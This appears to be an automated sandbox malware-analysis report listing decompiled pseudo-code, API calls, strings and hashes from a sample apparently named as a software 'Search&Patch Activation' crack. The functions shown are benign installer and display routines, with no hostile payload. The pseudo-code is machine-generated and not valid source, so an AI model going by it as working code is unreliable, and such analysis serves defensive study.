					_t18 = SHGetFileInfo(0x464330, 0,  &_v360, 0x160, 0x4011);
					E00410D20(E00418670(_t37), 0, _t18);
					_v8 = SetCursor(LoadCursorA(0, 0x7f02));
					 *[fs:eax] = _t56;
					 *((intOrPtr*)( *_t37 + 0x80))( *[fs:eax], 0x46430c, _t53);
					 *[fs:eax] = 0;
					_push(0x464313);
					return SetCursor(_v8);
				}
			}

0x00464225
0x00464227
0x0046422e
0x0046422f
0x00464231
0x0046423a
0x00464245
0x0046424e
0x00464318
0x00464254
0x00464261
0x0046427b
0x00464292
0x00464292
0x004642af
0x004642c1
0x004642d8
0x004642e6
0x004642ef
0x004642fa
0x004642fd
0x0046430b
0x0046430b

APIs

Part of subcall function 004168A0: GetClassInfoA.USER32 ref: 0041690F
Part of subcall function 004168A0: UnregisterClassA.USER32 ref: 0041693B
Part of subcall function 004168A0: RegisterClassA.USER32 ref: 0041695E

GetVersion.KERNEL32 ref: 00464254
SendMessageA.USER32 ref: 00464292
SHGetFileInfo.SHELL32(00464330,00000000,?,00000160,00004011), ref: 004642AF
LoadCursorA.USER32 ref: 004642CD
SetCursor.USER32(00000000,00000000,00007F02,00464330,00000000,?,00000160,00004011), ref: 004642D3
SetCursor.USER32(?,00464313,00007F02,00464330,00000000,?,00000160,00004011), ref: 00464306

Strings

Explorer, xrefs: 0046426E

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
String ID: Explorer
API String ID: 2594429197-512347832
Opcode ID: e4246b70e64443b15e1828aa2d441563241c4fbc43c60fe3ab0de6d9b0488d6c
Instruction ID: b3b98aa5a53488e53f8304eecf0dc9993ee5463f80e55bafd62bb8cbb11790a6
Opcode Fuzzy Hash: e4246b70e64443b15e1828aa2d441563241c4fbc43c60fe3ab0de6d9b0488d6c
Instruction Fuzzy Hash: 4321BB307403046AFF11BBB65C47B9A76989B45708F5040BBBA05EB2C3D9BD5851866D

Uniqueness

Uniqueness Score: -1.00%

Function 0047A4E4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66
libraryfileloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0047A4E4(void* __eax, void* __ecx, void* __edx) {
				char _v4112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t8;
				signed char _t11;
				intOrPtr* _t19;
				void* _t20;
				void* _t21;
				void* _t25;
				void* _t26;
				long _t27;
				void* _t28;
				void* _t29;
				void* _t30;

				_t21 = __ecx;
				_t30 = _t29 + 0xfffff004;
				_push(__eax);
				_t25 = __edx;
				_t26 = __eax;
				_t19 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetFinalPathNameByHandleA");
				if(_t19 == 0) {
					L9:
					_t8 = E00403494(_t25, _t26);
				} else {
					_t11 = GetFileAttributesA(E00403738(_t26));
					if(_t11 == 0xffffffff) {
						goto L9;
					} else {
						if((_t11 & 0x00000010) == 0) {
							_t27 = 0;
							__eflags = 0;
						} else {
							_t27 = 0x2000000;
						}
						_t28 = CreateFileA(E00403738(_t26), 0, 7, 0, 3, _t27, 0);
						if(_t28 == 0xffffffff) {
							goto L9;
						} else {
							_t20 =  *_t19(_t28,  &_v4112, 0x1000, 0);
							CloseHandle(_t28);
							if(_t20 <= 0) {
								goto L9;
							} else {
								_t37 = _t20 - 0xff0;
								if(_t20 >= 0xff0) {
									goto L9;
								} else {
									_t8 = E0047A40C(_t30, _t20, _t21, _t25, _t25, _t26, _t37);
								}
							}
						}
					}
				}
				return _t8;
			}

0x0047a4e4
0x0047a4e8
0x0047a4ee
0x0047a4ef
0x0047a4f1
0x0047a508
0x0047a50c
0x0047a57a
0x0047a57e
0x0047a50e
0x0047a516
0x0047a51e
0x00000000
0x0047a520
0x0047a522
0x0047a52b
0x0047a52b
0x0047a524
0x0047a524
0x0047a524
0x0047a545
0x0047a54a
0x00000000
0x0047a54c
0x0047a55b
0x0047a55e
0x0047a565
0x00000000
0x0047a567
0x0047a567
0x0047a56d
0x00000000
0x0047a56f
0x0047a573
0x0047a573
0x0047a56d
0x0047a565
0x0047a54a
0x0047a51e
0x0047a58d

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02252CC8,?,?,?,02252CC8,0047A6A8,00000000,0047A7C6,?,?,?,?), ref: 0047A4FD
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047A503
GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02252CC8,?,?,?,02252CC8,0047A6A8,00000000,0047A7C6,?,?,?,?), ref: 0047A516
CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02252CC8,?,?,?,02252CC8), ref: 0047A540
CloseHandle.KERNEL32(00000000,?,?,?,02252CC8,0047A6A8,00000000,0047A7C6,?,?,?,?), ref: 0047A55E

Strings

kernel32.dll, xrefs: 0047A4F8
GetFinalPathNameByHandleA, xrefs: 0047A4F3

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: FileHandle$AddressAttributesCloseCreateModuleProc
String ID: GetFinalPathNameByHandleA$kernel32.dll
API String ID: 2704155762-2318956294
Opcode ID: 9a2fa8f97a38dc74da99cb908791113ec1c22fa4b31381523c5c01c2eb65d99e
Instruction ID: 4c547af52153d5fc494c8abbb987ccd3797ba2b79672919e7250df90ec71fc91
Opcode Fuzzy Hash: 9a2fa8f97a38dc74da99cb908791113ec1c22fa4b31381523c5c01c2eb65d99e
Instruction Fuzzy Hash: 54019291B4070476E520717A4C86BBF264C8BD4769F248137BB1CFE2D2E9AD992601AF

Uniqueness

Uniqueness Score: -1.00%

Function 0045A69C Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0045A69C(void* __eax, void* __ebx, intOrPtr __ecx, char __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v9;
				char _v16;
				char _v20;
				char _v24;
				signed int _t43;
				intOrPtr _t50;
				void* _t64;
				void* _t70;
				void* _t75;
				intOrPtr _t87;
				signed int _t103;
				void* _t104;
				char _t106;
				void* _t109;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v24 = 0;
				_v8 = __ecx;
				_t106 = __edx;
				_t75 = __eax;
				_push(_t109);
				_push(0x45a81e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t109 + 0xffffffec;
				_t103 = E004532B8(__eax, __edx, __eflags);
				if(_t103 == 0xffffffff || (_t103 & 0x00000010) == 0) {
					_v9 = 1;
					goto L18;
				} else {
					_v20 = _t106;
					_v16 = 0xb;
					E004587AC("Deleting directory: %s", _t75, 0,  &_v20, _t103, _t106);
					if((_t103 & 0x00000001) == 0) {
						L9:
						_t43 = E004535E8(_t75, _t106, _t117);
						asm("sbb eax, eax");
						_v9 =  ~( ~_t43);
						if(_v9 != 0) {
							L18:
							_pop(_t87);
							 *[fs:eax] = _t87;
							_push(E0045A825);
							return E00403400( &_v24);
						}
						_t104 = GetLastError();
						if(_v8 == 0) {
							__eflags = _a4;
							if(_a4 == 0) {
								L16:
								_v20 = _t104;
								_v16 = 0;
								E004587AC("Failed to delete directory (%d).", _t75, 0,  &_v20, _t104, _t106);
								goto L18;
							}
							_t50 = E0045A4F4(_a4, _t75, _t106, _t104, _t106);
							__eflags = _t50;
							if(_t50 == 0) {
								goto L16;
							}
							__eflags =  *0x49c0dc - 2;
							if( *0x49c0dc != 2) {
								goto L16;
							}
							_v20 = _t104;
							_v16 = 0;
							E004587AC("Failed to delete directory (%d). Will delete on restart (if empty).", _t75, 0,  &_v20, _t104, _t106);
							E0045A5CC(_t75, _t75, _t106, _t104, _t106);
							goto L18;
						}
						_v20 = _t104;
						_v16 = 0;
						E004587AC("Failed to delete directory (%d). Will retry later.", _t75, 0,  &_v20, _t104, _t106);
						E00403510();
						E0040357C( &_v24, _t106);
						E00456B48(_v8, 0, _v24);
						goto L18;
					}
					_t115 = _t103 & 0x00000400;
					if((_t103 & 0x00000400) != 0) {
						L5:
						_t84 = _t103 & 0xfffffffe;
						_t64 = E00453660(_t75, _t103 & 0xfffffffe, _t106, _t116);
						_t117 = _t64;
						if(_t64 == 0) {
							E004585A0("Failed to strip read-only attribute.", _t75, _t84, _t103, _t106);
						} else {
							E004585A0("Stripped read-only attribute.", _t75, _t84, _t103, _t106);
						}
						goto L9;
					}
					_t70 = E00454BF0(_t75, _t75, _t106, _t103, _t106, _t115);
					_t116 = _t70;
					if(_t70 == 0) {
						E004585A0("Not stripping read-only attribute because the directory does not appear to be empty.", _t75, 0, _t103, _t106);
						goto L9;
					}
					goto L5;
				}
			}

0x0045a6a2
0x0045a6a3
0x0045a6a4
0x0045a6a7
0x0045a6aa
0x0045a6ad
0x0045a6af
0x0045a6b3
0x0045a6b4
0x0045a6b9
0x0045a6bc
0x0045a6c8
0x0045a6cd
0x0045a804
0x00000000
0x0045a6df
0x0045a6df
0x0045a6e2
0x0045a6f0
0x0045a6fb
0x0045a746
0x0045a74a
0x0045a751
0x0045a755
0x0045a75c
0x0045a808
0x0045a80a
0x0045a80d
0x0045a810
0x0045a81d
0x0045a81d
0x0045a767
0x0045a76d
0x0045a7ae
0x0045a7b2
0x0045a7ec
0x0045a7ec
0x0045a7ef
0x0045a7fd
0x00000000
0x0045a7fd
0x0045a7b9
0x0045a7be
0x0045a7c0
0x00000000
0x00000000
0x0045a7c2
0x0045a7c9
0x00000000
0x00000000
0x0045a7cb
0x0045a7ce
0x0045a7dc
0x0045a7e5
0x00000000
0x0045a7e5
0x0045a76f
0x0045a772
0x0045a780
0x0045a792
0x0045a79c
0x0045a7a7
0x00000000
0x0045a7a7
0x0045a6fd
0x0045a703
0x0045a712
0x0045a714
0x0045a71b
0x0045a720
0x0045a722
0x0045a735
0x0045a724
0x0045a729
0x0045a729
0x00000000
0x0045a722
0x0045a709
0x0045a70e
0x0045a710
0x0045a741
0x00000000
0x0045a741
0x00000000
0x0045a710

APIs

GetLastError.KERNEL32(00000000,0045A81E,?,00000000,00000000,00000000,?,00000006,?,00000000,0049A6E1,?,00000000,0049A784), ref: 0045A762

Part of subcall function 00454BF0: FindClose.KERNEL32(000000FF,00454CE6), ref: 00454CD5

Strings

Failed to delete directory (%d)., xrefs: 0045A7F8
Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 0045A7D7
Failed to delete directory (%d). Will retry later., xrefs: 0045A77B
Deleting directory: %s, xrefs: 0045A6EB
Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 0045A73C
Stripped read-only attribute., xrefs: 0045A724
Failed to strip read-only attribute., xrefs: 0045A730

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CloseErrorFindLast
String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
API String ID: 754982922-1448842058
Opcode ID: 5346217df39339977b51ae0a3ca3b2b9cdfea47d40e409fafac5e4da8c828573
Instruction ID: ed451348c7d3678a4819a833a09a40bf82a586c96773c367329f7393d5e0e002
Opcode Fuzzy Hash: 5346217df39339977b51ae0a3ca3b2b9cdfea47d40e409fafac5e4da8c828573
Instruction Fuzzy Hash: 9441A734A101189BCB00EB6988417AE76A59F89306F55867FAC01E7383DB7CCA1D875F

Uniqueness

Uniqueness Score: -1.00%

Function 00429910 Relevance: 12.1, APIs: 8, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00429910(void* __eax, void* __ebp, void* __eflags) {
				struct tagTEXTMETRICA _v84;
				signed int _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t15;
				signed int _t20;
				signed int _t22;
				struct HDC__* _t28;
				signed int _t29;
				signed int _t31;
				signed int _t32;
				void* _t33;
				void* _t37;
				void* _t39;
				struct tagTEXTMETRICA* _t41;

				_t39 = __eax;
				_t28 = GetDC(0);
				GetTextMetricsA(_t28, _t41);
				_t15 = SelectObject(_t28, E0041A678( *((intOrPtr*)(_t39 + 0x44)), _t28, _t33, _t37, _t39));
				GetTextMetricsA(_t28,  &_v84);
				SelectObject(_t28, _t15);
				ReleaseDC(0, _t28);
				if( *0x49e5c8 == 0) {
					_t29 = _t41->tmHeight;
					_t20 = _v100;
					if(_t29 > _t20) {
						_t29 = _t20;
					}
					_t22 = GetSystemMetrics(6) << 2;
					if(_t29 < 0) {
						_t29 = _t29 + 3;
					}
					_t31 = _t22 + (_t29 >> 2);
				} else {
					if( *((char*)(_t39 + 0xc5)) == 0) {
						_t32 = 6;
					} else {
						_t32 = 8;
					}
					_t31 = GetSystemMetrics(6) * _t32;
				}
				return E00414ACC(_t39, _v100 + _t31);
			}

0x00429916
0x0042991f
0x00429923
0x00429932
0x0042993f
0x00429946
0x0042994e
0x0042995a
0x0042997e
0x00429981
0x00429987
0x00429989
0x00429989
0x00429992
0x00429997
0x00429999
0x00429999
0x004299a1
0x0042995c
0x00429963
0x0042996c
0x00429965
0x00429965
0x00429965
0x0042997a
0x0042997a
0x004299b6

APIs

GetDC.USER32(00000000), ref: 0042991A
GetTextMetricsA.GDI32(00000000), ref: 00429923

Part of subcall function 0041A678: CreateFontIndirectA.GDI32(?), ref: 0041A737

SelectObject.GDI32(00000000,00000000), ref: 00429932
GetTextMetricsA.GDI32(00000000,?), ref: 0042993F
SelectObject.GDI32(00000000,00000000), ref: 00429946
ReleaseDC.USER32 ref: 0042994E
GetSystemMetrics.USER32 ref: 00429973
GetSystemMetrics.USER32 ref: 0042998D

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
String ID:
API String ID: 1583807278-0
Opcode ID: fcd26ccfdf6108e84c8416210a92b931db41bfea8d69a3a7f30610f4478b51e7
Instruction ID: 064b8ceea34646deb673d9898a5f132a00f345b4bbd4d539d92df2c89931976d
Opcode Fuzzy Hash: fcd26ccfdf6108e84c8416210a92b931db41bfea8d69a3a7f30610f4478b51e7
Instruction Fuzzy Hash: 1801C4D17047112BF710B2B69CC2F6B5588DB84368F44053FFA869A3D3E97D9C80866E

Uniqueness

Uniqueness Score: -1.00%

Function 0041E2B4 Relevance: 12.1, APIs: 8, Instructions: 60
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E2B4() {
				int _t4;
				struct HDC__* _t23;

				_t23 = GetDC(0);
				 *0x49e608 = GetDeviceCaps(_t23, 0x5a);
				ReleaseDC(0, _t23);
				_t4 =  *0x49e608; // 0x60
				 *0x49c4e4 =  ~(MulDiv(8, _t4, 0x48));
				 *0x49e60c = GetStockObject(7);
				 *0x49e610 = GetStockObject(5);
				 *0x49e614 = GetStockObject(0xd);
				 *0x49e618 = LoadIconA(0, 0x7f00);
				 *0x49e61c = E00419FCC(0x2c, 1);
				 *0x49e620 = E00419FCC(0x10, 1);
				 *0x49e624 = E00419FCC(0x10, 1);
				 *0x49c564 = E00402B30(1);
				 *0x49e628 = E00402B30(1);
				return E0040B23C(0x4194f0, 0x41a4f8, 0x41a528);
			}

0x0041e2bc
0x0041e2c6
0x0041e2ce
0x0041e2d5
0x0041e2e4
0x0041e2f0
0x0041e2fc
0x0041e308
0x0041e319
0x0041e32e
0x0041e343
0x0041e358
0x0041e369
0x0041e37a
0x0041e394

APIs

GetDC.USER32(00000000), ref: 0041E2B7
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041E2C1
ReleaseDC.USER32 ref: 0041E2CE
MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041E2DD
GetStockObject.GDI32(00000007), ref: 0041E2EB
GetStockObject.GDI32(00000005), ref: 0041E2F7
GetStockObject.GDI32(0000000D), ref: 0041E303
LoadIconA.USER32(00000000,00007F00), ref: 0041E314

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ObjectStock$CapsDeviceIconLoadRelease
String ID:
API String ID: 225703358-0
Opcode ID: 23cce13aa5fe555fb55eaf4af2e89c8eae1af8f60db2075199e19e80c48d8f58
Instruction ID: eda06bb9e73b08d19024368069479301758e63dc44a0e31fec7fdbc279e4b1ec
Opcode Fuzzy Hash: 23cce13aa5fe555fb55eaf4af2e89c8eae1af8f60db2075199e19e80c48d8f58
Instruction Fuzzy Hash: 8C112B70645301AAE740FF765996BAA3690D724708F40943BF604EF3D2DB7E5C418B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00464634 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00464634(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				struct HICON__* _v12;
				char _v16;
				char _v17;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _t129;
				signed int _t136;
				signed int _t139;
				signed int _t142;
				intOrPtr _t149;
				intOrPtr _t153;
				intOrPtr _t157;
				intOrPtr _t158;
				intOrPtr _t159;
				signed int _t165;
				signed int _t172;
				signed int _t177;
				signed int _t180;
				void* _t183;
				void* _t186;
				intOrPtr _t188;
				intOrPtr _t191;
				void* _t204;
				intOrPtr _t212;
				intOrPtr _t238;
				signed int _t239;
				intOrPtr _t240;
				signed int _t245;
				intOrPtr _t247;
				intOrPtr _t249;
				void* _t253;
				void* _t257;
				void* _t262;
				void* _t264;
				signed int* _t270;
				intOrPtr _t271;
				intOrPtr _t272;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t277;
				intOrPtr _t278;
				void* _t279;

				_t267 = __edi;
				_t276 = _t277;
				_t278 = _t277 + 0xffffffc8;
				_v16 = 0;
				_t216 = __edx;
				_v8 = __eax;
				 *[fs:eax] = _t278;
				_t220 =  *_v8;
				 *((intOrPtr*)( *_v8 - 0x10))( *[fs:eax], 0x4649ee, _t276, __edi, __esi, __ebx, _t275);
				_t129 =  *((intOrPtr*)(__edx + 8));
				_t238 =  *((intOrPtr*)(_t129 + 8));
				_t279 = _t238 - 0xfffffe6b;
				if(_t279 > 0) {
					_t239 = _t238 - 0xfffffe6d;
					__eflags = _t239;
					if(_t239 == 0) {
						_t270 =  *((intOrPtr*)(__edx + 8)) + 0xc;
						__eflags =  *_t270 & 0x00000002;
						if(( *_t270 & 0x00000002) != 0) {
							_t270[6] =  *((intOrPtr*)( *_v8 + 0x84))(0);
						}
						__eflags =  *_t270 & 0x00000020;
						if(( *_t270 & 0x00000020) != 0) {
							_t270[7] =  *((intOrPtr*)( *_v8 + 0x84))(1);
						}
						__eflags =  *_t270 & 0x00000040;
						if(( *_t270 & 0x00000040) != 0) {
							E00418670(_v8);
							_t136 = E00410D58();
							__eflags = _t136;
							_t270[8] = (_t136 & 0xffffff00 | _t136 != 0x00000000) & 0x0000007f;
							__eflags = _t270[8];
							if(_t270[8] == 0) {
								_t139 = _t270[9];
								__eflags =  *((char*)(_t139 + 4));
								if( *((char*)(_t139 + 4)) == 0) {
									_t142 =  *((intOrPtr*)( *_v8 + 0x8c))() & 0x0000007f;
									__eflags = _t142;
									_t270[8] = _t142;
								}
							}
						}
						 *_t270 =  *_t270 | 0x00001000;
					} else {
						_t245 = _t239 - 1;
						__eflags = _t245;
						if(_t245 == 0) {
							_t149 = _v8;
							__eflags =  *((char*)(_t149 + 0xfc));
							if( *((char*)(_t149 + 0xfc)) == 0) {
								E004644E4(_v8, __edx, __edi, __esi);
							}
						} else {
							__eflags = _t245 - 0x190;
							if(__eflags == 0) {
								E00464570(_t220, __eflags, _t276);
								 *(_t216 + 0xc) = 1;
							}
						}
					}
					goto L51;
				} else {
					if(_t279 == 0) {
						_t153 = _v8;
						__eflags =  *((char*)(_t153 + 0x105));
						if( *((char*)(_t153 + 0x105)) != 0) {
							E0040909C("Internal error: Item already expanding", 1);
							E0040311C();
						}
						 *((char*)(_v8 + 0x105)) = 1;
						_push(_t276);
						_push(0x4647cd);
						_push( *[fs:eax]);
						 *[fs:eax] = _t278;
						_t271 =  *((intOrPtr*)(_t216 + 8));
						__eflags =  *((intOrPtr*)(_t271 + 0xc)) - 2;
						if( *((intOrPtr*)(_t271 + 0xc)) != 2) {
							L22:
							__eflags = 0;
							_pop(_t247);
							 *[fs:eax] = _t247;
							_push(0x4649d8);
							_t157 = _v8;
							 *((char*)(_t157 + 0x105)) = 0;
							return _t157;
						} else {
							_t158 =  *((intOrPtr*)(_t271 + 0x5c));
							__eflags =  *((char*)(_t158 + 5));
							if( *((char*)(_t158 + 5)) != 0) {
								goto L22;
							} else {
								_t159 =  *((intOrPtr*)(_t271 + 0x5c));
								__eflags =  *((char*)(_t159 + 4));
								if( *((char*)(_t159 + 4)) != 0) {
									goto L22;
								} else {
									 *((char*)( *((intOrPtr*)(_t271 + 0x5c)) + 5)) = 1;
									_v12 = SetCursor(LoadCursorA(0, 0x7f02));
									 *[fs:eax] = _t278;
									_t165 =  *((intOrPtr*)( *_v8 + 0x80))( *[fs:eax], 0x4647ae, _t276);
									__eflags = _t165;
									if(_t165 == 0) {
										 *((char*)( *((intOrPtr*)(_t271 + 0x5c)) + 5)) = 0;
										 *(_t216 + 0xc) = 1;
									} else {
										E00418670(_v8);
										_t172 = E00410D58();
										__eflags = _t172;
										if(_t172 == 0) {
											E00464A2C(_v8, 0,  *((intOrPtr*)(_t271 + 0x3c)));
										}
									}
									__eflags = 0;
									_pop(_t249);
									 *[fs:eax] = _t249;
									_push(0x4647b5);
									return SetCursor(_v12);
								}
							}
						}
					} else {
						_t253 = _t238 - 0xfffffe61;
						if(_t253 == 0) {
							_t272 = _t129;
							__eflags =  *(_t272 + 0x14);
							if( *(_t272 + 0x14) != 0) {
								__eflags =  *(_t272 + 0x3c);
								if( *(_t272 + 0x3c) != 0) {
									E00418670(_v8);
									_t183 = E00410D70();
									E00418670(_v8);
									_t186 = E00410D70();
									__eflags = _t183 - _t186;
									if(_t183 != _t186) {
										_t111 = __edx + 0xc;
										 *_t111 =  *(__edx + 0xc) | 0x00000001;
										__eflags =  *_t111;
									}
								}
							}
							_t177 =  *(_t272 + 0x3c);
							__eflags = _t177;
							if(_t177 != 0) {
								_v60 = 8;
								_v56 = _t177;
								_v48 = 0x20;
								_t180 = E00410DC0(E00418670(_v8),  &_v60);
								__eflags = _t180;
								if(_t180 != 0) {
									__eflags = _v52 & 0x00000020;
									if((_v52 & 0x00000020) != 0) {
										_t122 = _t216 + 0xc;
										 *_t122 =  *(_t216 + 0xc) | 0x00000002;
										__eflags =  *_t122;
									}
								}
							}
						} else {
							_t257 = _t253 - 4;
							if(_t257 == 0) {
								_t273 =  *((intOrPtr*)(__edx + 8)) + 0xc;
								_t188 =  *((intOrPtr*)(_t273 + 0x24));
								__eflags =  *((char*)(_t188 + 4));
								if( *((char*)(_t188 + 4)) != 0) {
									__eflags =  *(_t273 + 0x10);
									if( *(_t273 + 0x10) != 0) {
										E0040352C( &_v16,  *(_t273 + 0x10));
										_v17 = 1;
										_t191 = _v8;
										__eflags =  *((short*)(_t191 + 0x112));
										if( *((short*)(_t191 + 0x112)) != 0) {
											_t216 = _v8;
											 *((intOrPtr*)(_v8 + 0x110))( &_v17);
										}
										__eflags = _v17;
										if(_v17 != 0) {
											E00403450( *((intOrPtr*)(_t273 + 0x24)), _t216, _v16, _t267, _t273);
											_v60 = 1;
											_v56 =  *(_t273 + 4);
											_v44 = E00403738(_v16);
											E00410DD8(E00418670(_v8),  &_v60);
											E00418670(_v8);
											_push(E00410D70());
											_t204 = E00418670(_v8);
											_pop(_t262);
											E00410E34(_t204, 0, _t262);
											E004644E4(_v8, _t216, _t267, _t273);
										}
									}
								}
							} else {
								_t264 = _t257 - 1;
								if(_t264 == 0) {
									_t212 =  *((intOrPtr*)( *((intOrPtr*)(__edx + 8)) + 0x30));
									__eflags =  *((char*)(_t212 + 4));
									if( *((char*)(_t212 + 4)) == 0) {
										 *(__edx + 0xc) = 1;
									}
								} else {
									if(_t264 == 1) {
										E00403B94( *((intOrPtr*)(_t129 + 0x34)));
									}
								}
							}
						}
						L51:
						_pop(_t240);
						 *[fs:eax] = _t240;
						_push(0x4649f5);
						return E00403400( &_v16);
					}
				}
			}

0x00464634
0x00464635
0x00464637
0x0046463f
0x00464642
0x00464644
0x00464652
0x0046465a
0x0046465c
0x0046465f
0x00464662
0x00464665
0x0046466b
0x00464693
0x00464693
0x00464699
0x004647d7
0x004647da
0x004647dd
0x004647f5
0x004647f5
0x004647f8
0x004647fb
0x00464813
0x00464813
0x00464816
0x00464819
0x0046481e
0x00464826
0x0046482b
0x00464833
0x00464836
0x0046483a
0x0046483c
0x0046483f
0x00464843
0x00464853
0x00464853
0x00464856
0x00464856
0x00464843
0x0046483a
0x00464859
0x0046469f
0x0046469f
0x0046469f
0x004646a0
0x00464864
0x00464867
0x0046486e
0x00464877
0x00464877
0x004646a6
0x004646a6
0x004646ac
0x0046495b
0x00464961
0x00464961
0x004646ac
0x004646a0
0x00000000
0x0046466d
0x0046466d
0x004646c9
0x004646cc
0x004646d3
0x004646e1
0x004646e6
0x004646e6
0x004646ee
0x004646f7
0x004646f8
0x004646fd
0x00464700
0x00464703
0x00464706
0x0046470a
0x004647b5
0x004647b5
0x004647b7
0x004647ba
0x004647bd
0x004647c2
0x004647c5
0x004647cc
0x00464710
0x00464710
0x00464713
0x00464717
0x00000000
0x0046471d
0x0046471d
0x00464720
0x00464724
0x00000000
0x0046472a
0x0046472d
0x00464743
0x00464751
0x0046475c
0x00464762
0x00464764
0x0046478c
0x00464790
0x00464766
0x00464769
0x00464771
0x00464776
0x00464778
0x00464782
0x00464782
0x00464778
0x00464797
0x00464799
0x0046479c
0x0046479f
0x004647ad
0x004647ad
0x00464724
0x00464717
0x0046466f
0x0046466f
0x00464675
0x0046496a
0x0046496c
0x00464970
0x00464972
0x00464976
0x0046497b
0x00464983
0x0046498d
0x00464995
0x0046499a
0x0046499c
0x0046499e
0x0046499e
